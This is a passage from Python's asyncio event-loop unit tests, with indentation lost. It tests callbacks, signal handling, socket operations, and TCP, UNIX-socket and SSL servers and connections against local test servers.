# 15.6 msec, we use fairly long sleep times here (~100 msec).
def test_run_until_complete(self):
t0 = self.loop.time()
self.loop.run_until_complete(asyncio.sleep(0.1, loop=self.loop))
t1 = self.loop.time()
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_run_until_complete_stopped(self):
@asyncio.coroutine
def cb():
self.loop.stop()
yield from asyncio.sleep(0.1, loop=self.loop)
task = cb()
self.assertRaises(RuntimeError,
self.loop.run_until_complete, task)
def test_call_later(self):
results = []
def callback(arg):
results.append(arg)
self.loop.stop()
self.loop.call_later(0.1, callback, 'hello world')
t0 = time.monotonic()
self.loop.run_forever()
t1 = time.monotonic()
self.assertEqual(results, ['hello world'])
self.assertTrue(0.08 <= t1-t0 <= 0.8, t1-t0)
def test_call_soon(self):
results = []
def callback(arg1, arg2):
results.append((arg1, arg2))
self.loop.stop()
self.loop.call_soon(callback, 'hello', 'world')
self.loop.run_forever()
self.assertEqual(results, [('hello', 'world')])
def test_call_soon_threadsafe(self):
results = []
lock = threading.Lock()
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
def run_in_thread():
self.loop.call_soon_threadsafe(callback, 'hello')
lock.release()
lock.acquire()
t = threading.Thread(target=run_in_thread)
t.start()
with lock:
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
t.join()
self.assertEqual(results, ['hello', 'world'])
def test_call_soon_threadsafe_same_thread(self):
results = []
def callback(arg):
results.append(arg)
if len(results) >= 2:
self.loop.stop()
self.loop.call_soon_threadsafe(callback, 'hello')
self.loop.call_soon(callback, 'world')
self.loop.run_forever()
self.assertEqual(results, ['hello', 'world'])
def test_run_in_executor(self):
def run(arg):
return (arg, threading.get_ident())
f2 = self.loop.run_in_executor(None, run, 'yo')
res, thread_id = self.loop.run_until_complete(f2)
self.assertEqual(res, 'yo')
self.assertNotEqual(thread_id, threading.get_ident())
def test_reader_callback(self):
r, w = test_utils.socketpair()
r.setblocking(False)
bytes_read = bytearray()
def reader():
try:
data = r.recv(1024)
except BlockingIOError:
# Spurious readiness notifications are possible
# at least on Linux -- see man select.
return
if data:
bytes_read.extend(data)
else:
self.assertTrue(self.loop.remove_reader(r.fileno()))
r.close()
self.loop.add_reader(r.fileno(), reader)
self.loop.call_soon(w.send, b'abc')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 3)
self.loop.call_soon(w.send, b'def')
test_utils.run_until(self.loop, lambda: len(bytes_read) >= 6)
self.loop.call_soon(w.close)
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(bytes_read, b'abcdef')
def test_writer_callback(self):
r, w = test_utils.socketpair()
w.setblocking(False)
def writer(data):
w.send(data)
self.loop.stop()
data = b'x' * 1024
self.loop.add_writer(w.fileno(), writer, data)
self.loop.run_forever()
self.assertTrue(self.loop.remove_writer(w.fileno()))
self.assertFalse(self.loop.remove_writer(w.fileno()))
w.close()
read = r.recv(len(data) * 2)
r.close()
self.assertEqual(read, data)
def _basetest_sock_client_ops(self, httpd, sock):
if not isinstance(self.loop, proactor_events.BaseProactorEventLoop):
# in debug mode, socket operations must fail
# if the socket is not in blocking mode
self.loop.set_debug(True)
sock.setblocking(True)
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
with self.assertRaises(ValueError):
self.loop.run_until_complete(
self.loop.sock_accept(sock))
# test in non-blocking mode
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, httpd.address))
self.loop.run_until_complete(
self.loop.sock_sendall(sock, b'GET / HTTP/1.0\r\n\r\n'))
data = self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
# consume data
self.loop.run_until_complete(
self.loop.sock_recv(sock, 1024))
sock.close()
self.assertTrue(data.startswith(b'HTTP/1.0 200 OK'))
def test_sock_client_ops(self):
with test_utils.run_test_server() as httpd:
sock = socket.socket()
self._basetest_sock_client_ops(httpd, sock)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_unix_sock_client_ops(self):
with test_utils.run_test_unix_server() as httpd:
sock = socket.socket(socket.AF_UNIX)
self._basetest_sock_client_ops(httpd, sock)
def test_sock_client_fail(self):
# Make sure that we will get an unused port
address = None
try:
s = socket.socket()
s.bind(('127.0.0.1', 0))
address = s.getsockname()
finally:
s.close()
sock = socket.socket()
sock.setblocking(False)
with self.assertRaises(ConnectionRefusedError):
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
sock.close()
def test_sock_accept(self):
listener = socket.socket()
listener.setblocking(False)
listener.bind(('127.0.0.1', 0))
listener.listen(1)
client = socket.socket()
client.connect(listener.getsockname())
f = self.loop.sock_accept(listener)
conn, addr = self.loop.run_until_complete(f)
self.assertEqual(conn.gettimeout(), 0)
self.assertEqual(addr, client.getsockname())
self.assertEqual(client.getpeername(), listener.getsockname())
client.close()
conn.close()
listener.close()
@unittest.skipUnless(hasattr(signal, 'SIGKILL'), 'No SIGKILL')
def test_add_signal_handler(self):
caught = 0
def my_handler():
nonlocal caught
caught += 1
# Check error behavior first.
self.assertRaises(
TypeError, self.loop.add_signal_handler, 'boom', my_handler)
self.assertRaises(
TypeError, self.loop.remove_signal_handler, 'boom')
self.assertRaises(
ValueError, self.loop.add_signal_handler, signal.NSIG+1,
my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, signal.NSIG+1)
self.assertRaises(
ValueError, self.loop.add_signal_handler, 0, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, 0)
self.assertRaises(
ValueError, self.loop.add_signal_handler, -1, my_handler)
self.assertRaises(
ValueError, self.loop.remove_signal_handler, -1)
self.assertRaises(
RuntimeError, self.loop.add_signal_handler, signal.SIGKILL,
my_handler)
# Removing SIGKILL doesn't raise, since we don't call signal().
self.assertFalse(self.loop.remove_signal_handler(signal.SIGKILL))
# Now set a handler and handle it.
self.loop.add_signal_handler(signal.SIGINT, my_handler)
os.kill(os.getpid(), signal.SIGINT)
test_utils.run_until(self.loop, lambda: caught)
# Removing it should restore the default handler.
self.assertTrue(self.loop.remove_signal_handler(signal.SIGINT))
self.assertEqual(signal.getsignal(signal.SIGINT),
signal.default_int_handler)
# Removing again returns False.
self.assertFalse(self.loop.remove_signal_handler(signal.SIGINT))
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_while_selecting(self):
# Test with a signal actually arriving during a select() call.
caught = 0
def my_handler():
nonlocal caught
caught += 1
self.loop.stop()
self.loop.add_signal_handler(signal.SIGALRM, my_handler)
signal.setitimer(signal.ITIMER_REAL, 0.01, 0) # Send SIGALRM once.
self.loop.run_forever()
self.assertEqual(caught, 1)
@unittest.skipUnless(hasattr(signal, 'SIGALRM'), 'No SIGALRM')
def test_signal_handling_args(self):
some_args = (42,)
caught = 0
def my_handler(*args):
nonlocal caught
caught += 1
self.assertEqual(args, some_args)
self.loop.add_signal_handler(signal.SIGALRM, my_handler, *some_args)
signal.setitimer(signal.ITIMER_REAL, 0.1, 0) # Send SIGALRM once.
self.loop.call_later(0.5, self.loop.stop)
self.loop.run_forever()
self.assertEqual(caught, 1)
def _basetest_create_connection(self, connection_fut, check_sockname=True):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertIs(pr.transport, tr)
if check_sockname:
self.assertIsNotNone(tr.get_extra_info('sockname'))
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def test_create_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = self.loop.create_connection(
lambda: MyProto(loop=self.loop), *httpd.address)
self._basetest_create_connection(conn_fut)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server() as httpd:
conn_fut = self.loop.create_unix_connection(
lambda: MyProto(loop=self.loop), httpd.address)
self._basetest_create_connection(conn_fut, check_sockname)
def test_create_connection_sock(self):
with test_utils.run_test_server() as httpd:
sock = None
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*httpd.address, type=socket.SOCK_STREAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
self.loop.run_until_complete(
self.loop.sock_connect(sock, address))
except:
pass
else:
break
else:
assert False, 'Can not create socket.'
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def check_ssl_extra_info(self, client, check_sockname=True,
peername=None, peercert={}):
if check_sockname:
self.assertIsNotNone(client.get_extra_info('sockname'))
if peername:
self.assertEqual(peername,
client.get_extra_info('peername'))
else:
self.assertIsNotNone(client.get_extra_info('peername'))
self.assertEqual(peercert,
client.get_extra_info('peercert'))
# test SSL cipher
cipher = client.get_extra_info('cipher')
self.assertIsInstance(cipher, tuple)
self.assertEqual(len(cipher), 3, cipher)
self.assertIsInstance(cipher[0], str)
self.assertIsInstance(cipher[1], str)
self.assertIsInstance(cipher[2], int)
# test SSL object
sslobj = client.get_extra_info('ssl_object')
self.assertIsNotNone(sslobj)
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
self.assertEqual(sslobj.cipher(),
client.get_extra_info('cipher'))
self.assertEqual(sslobj.getpeercert(),
client.get_extra_info('peercert'))
self.assertEqual(sslobj.compression(),
client.get_extra_info('compression'))
def _basetest_create_ssl_connection(self, connection_fut,
check_sockname=True,
peername=None):
tr, pr = self.loop.run_until_complete(connection_fut)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, asyncio.Protocol)
self.assertTrue('ssl' in tr.__class__.__name__.lower())
self.check_ssl_extra_info(tr, check_sockname, peername)
self.loop.run_until_complete(pr.done)
self.assertGreater(pr.nbytes, 0)
tr.close()
def _test_create_ssl_connection(self, httpd, create_connection,
check_sockname=True, peername=None):
conn_fut = create_connection(ssl=test_utils.dummy_ssl_context())
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
# ssl.Purpose was introduced in Python 3.4
if hasattr(ssl, 'Purpose'):
def _dummy_ssl_create_context(purpose=ssl.Purpose.SERVER_AUTH, *,
cafile=None, capath=None,
cadata=None):
"""
A ssl.create_default_context() replacement that doesn't enable
cert validation.
"""
self.assertEqual(purpose, ssl.Purpose.SERVER_AUTH)
return test_utils.dummy_ssl_context()
# With ssl=True, ssl.create_default_context() should be called
with mock.patch('ssl.create_default_context',
side_effect=_dummy_ssl_create_context) as m:
conn_fut = create_connection(ssl=True)
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(m.call_count, 1)
# With the real ssl.create_default_context(), certificate
# validation will fail
with self.assertRaises(ssl.SSLError) as cm:
conn_fut = create_connection(ssl=True)
# Ignore the "SSL handshake failed" log in debug mode
with test_utils.disable_logger():
self._basetest_create_ssl_connection(conn_fut, check_sockname,
peername)
self.assertEqual(cm.exception.reason, 'CERTIFICATE_VERIFY_FAILED')
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_ssl_connection(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_connection,
lambda: MyProto(loop=self.loop),
*httpd.address)
self._test_create_ssl_connection(httpd, create_connection,
peername=httpd.address)
def test_legacy_create_ssl_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_connection()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_ssl_unix_connection(self):
# Issue #20682: On Mac OS X Tiger, getsockname() returns a
# zero-length address for UNIX socket.
check_sockname = not osx_tiger()
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
create_connection = functools.partial(
self.loop.create_unix_connection,
lambda: MyProto(loop=self.loop), httpd.address,
server_hostname='127.0.0.1')
self._test_create_ssl_connection(httpd, create_connection,
check_sockname,
peername=httpd.address)
def test_legacy_create_ssl_unix_connection(self):
with test_utils.force_legacy_ssl_support():
self.test_create_ssl_unix_connection()
def test_create_connection_local_addr(self):
with test_utils.run_test_server() as httpd:
port = support.find_unused_port()
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=(httpd.address[0], port))
tr, pr = self.loop.run_until_complete(f)
expected = pr.transport.get_extra_info('sockname')[1]
self.assertEqual(port, expected)
tr.close()
def test_create_connection_local_addr_in_use(self):
with test_utils.run_test_server() as httpd:
f = self.loop.create_connection(
lambda: MyProto(loop=self.loop),
*httpd.address, local_addr=httpd.address)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
self.assertIn(str(httpd.address), cm.exception.strerror)
def test_connect_accepted_socket(self, server_ssl=None, client_ssl=None):
loop = self.loop
class MyProto(MyBaseProto):
def connection_lost(self, exc):
super().connection_lost(exc)
loop.call_soon(loop.stop)
def data_received(self, data):
super().data_received(data)
self.transport.write(expected_response)
lsock = socket.socket()
lsock.bind(('127.0.0.1', 0))
lsock.listen(1)
addr = lsock.getsockname()
message = b'test data'
response = None
expected_response = b'roger'
def client():
nonlocal response
try:
csock = socket.socket()
if client_ssl is not None:
csock = client_ssl.wrap_socket(csock)
csock.connect(addr)
csock.sendall(message)
response = csock.recv(99)
csock.close()
except Exception as exc:
print(
"Failure in client thread in test_connect_accepted_socket",
exc)
thread = threading.Thread(target=client, daemon=True)
thread.start()
conn, _ = lsock.accept()
proto = MyProto(loop=loop)
proto.loop = loop
f = loop.create_task(
loop.connect_accepted_socket(
(lambda : proto), conn, ssl=server_ssl))
loop.run_forever()
proto.transport.close()
lsock.close()
thread.join(1)
self.assertFalse(thread.is_alive())
self.assertEqual(proto.state, 'CLOSED')
self.assertEqual(proto.nbytes, len(message))
self.assertEqual(response, expected_response)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_ssl_connect_accepted_socket(self):
if (sys.platform == 'win32' and
sys.version_info < (3, 5) and
isinstance(self.loop, proactor_events.BaseProactorEventLoop)
):
raise unittest.SkipTest(
'SSL not supported with proactor event loops before Python 3.5'
)
server_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
if hasattr(server_context, 'check_hostname'):
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
client_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
if hasattr(server_context, 'check_hostname'):
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
self.test_connect_accepted_socket(server_context, client_context)
@mock.patch('asyncio.base_events.socket')
def create_server_multiple_hosts(self, family, hosts, mock_sock):
@asyncio.coroutine
def getaddrinfo(host, port, *args, **kw):
if family == socket.AF_INET:
return [(family, socket.SOCK_STREAM, 6, '', (host, port))]
else:
return [(family, socket.SOCK_STREAM, 6, '', (host, port, 0, 0))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
unique_hosts = set(hosts)
if family == socket.AF_INET:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80) for host in unique_hosts]
else:
mock_sock.socket().getsockbyname.side_effect = [
(host, 80, 0, 0) for host in unique_hosts]
self.loop.getaddrinfo = getaddrinfo_task
self.loop._start_serving = mock.Mock()
self.loop._stop_serving = mock.Mock()
f = self.loop.create_server(lambda: MyProto(self.loop), hosts, 80)
server = self.loop.run_until_complete(f)
self.addCleanup(server.close)
server_hosts = {sock.getsockbyname()[0] for sock in server.sockets}
self.assertEqual(server_hosts, unique_hosts)
def test_create_server_multiple_hosts_ipv4(self):
self.create_server_multiple_hosts(socket.AF_INET,
['1.2.3.4', '5.6.7.8', '1.2.3.4'])
def test_create_server_multiple_hosts_ipv6(self):
self.create_server_multiple_hosts(socket.AF_INET6,
['::1', '::2', '::1'])
def test_create_server(self):
proto = MyProto(self.loop)
f = self.loop.create_server(lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('sockname'))
self.assertEqual('127.0.0.1',
proto.transport.get_extra_info('peername')[0])
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'SO_REUSEPORT'), 'No SO_REUSEPORT')
def test_create_server_reuse_port(self):
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
test_utils.run_briefly(self.loop)
proto = MyProto(self.loop)
f = self.loop.create_server(
lambda: proto, '0.0.0.0', 0, reuse_port=True)
server = self.loop.run_until_complete(f)
self.assertEqual(len(server.sockets), 1)
sock = server.sockets[0]
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
server.close()
def _make_unix_server(self, factory, **kwargs):
path = test_utils.gen_unix_socket_path()
self.addCleanup(lambda: os.path.exists(path) and os.unlink(path))
f = self.loop.create_unix_server(factory, path, **kwargs)
server = self.loop.run_until_complete(f)
return server, path
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server(self):
proto = MyProto(loop=self.loop)
server, path = self._make_unix_server(lambda: proto)
self.assertEqual(len(server.sockets), 1)
client = socket.socket(socket.AF_UNIX)
client.connect(path)
client.sendall(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# close server
server.close()
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_path_socket_error(self):
proto = MyProto(loop=self.loop)
sock = socket.socket()
with sock:
f = self.loop.create_unix_server(lambda: proto, '/test', sock=sock)
with self.assertRaisesRegex(ValueError,
'path and sock can not be specified '
'at the same time'):
self.loop.run_until_complete(f)
def _create_ssl_context(self, certfile, keyfile=None):
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.options |= ssl.OP_NO_SSLv2
sslcontext.load_cert_chain(certfile, keyfile)
return sslcontext
def _make_ssl_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
f = self.loop.create_server(factory, '127.0.0.1', 0, ssl=sslcontext)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
self.assertEqual(host, '127.0.0.1')
return server, host, port
def _make_ssl_unix_server(self, factory, certfile, keyfile=None):
sslcontext = self._create_ssl_context(certfile, keyfile)
return self._make_unix_server(factory, ssl=sslcontext)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, ONLYCERT, ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
# the client socket must be closed after to avoid ECONNRESET upon
# recv()/send() on the serving socket
client.close()
# stop serving
server.close()
def test_legacy_create_unix_server_ssl(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
def test_legacy_create_unix_server_ssl_verify_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verify_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"hostname '127.0.0.1' doesn't match 'localhost'"):
self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
server.close()
def test_legacy_create_server_ssl_match_failed(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_match_failed()
@unittest.skipIf(ssl is None, 'No ssl module')
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_unix_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_unix_server_ssl_verified()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client,peername=(host, port),
peercert=PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_legacy_create_server_ssl_verified(self):
with test_utils.force_legacy_ssl_support():
self.test_create_server_ssl_verified()
def test_create_server_sock(self):
proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertIs(sock, sock_ob)
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.socket(type=socket.SOCK_STREAM)
sock_ob.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock_ob.bind(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = asyncio.Future(loop=self.loop)
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = asyncio.Future(loop=self.loop)
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
def test_create_datagram_endpoint(self):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=('127.0.0.1', 0))
s_transport, server = self.loop.run_until_complete(coro)
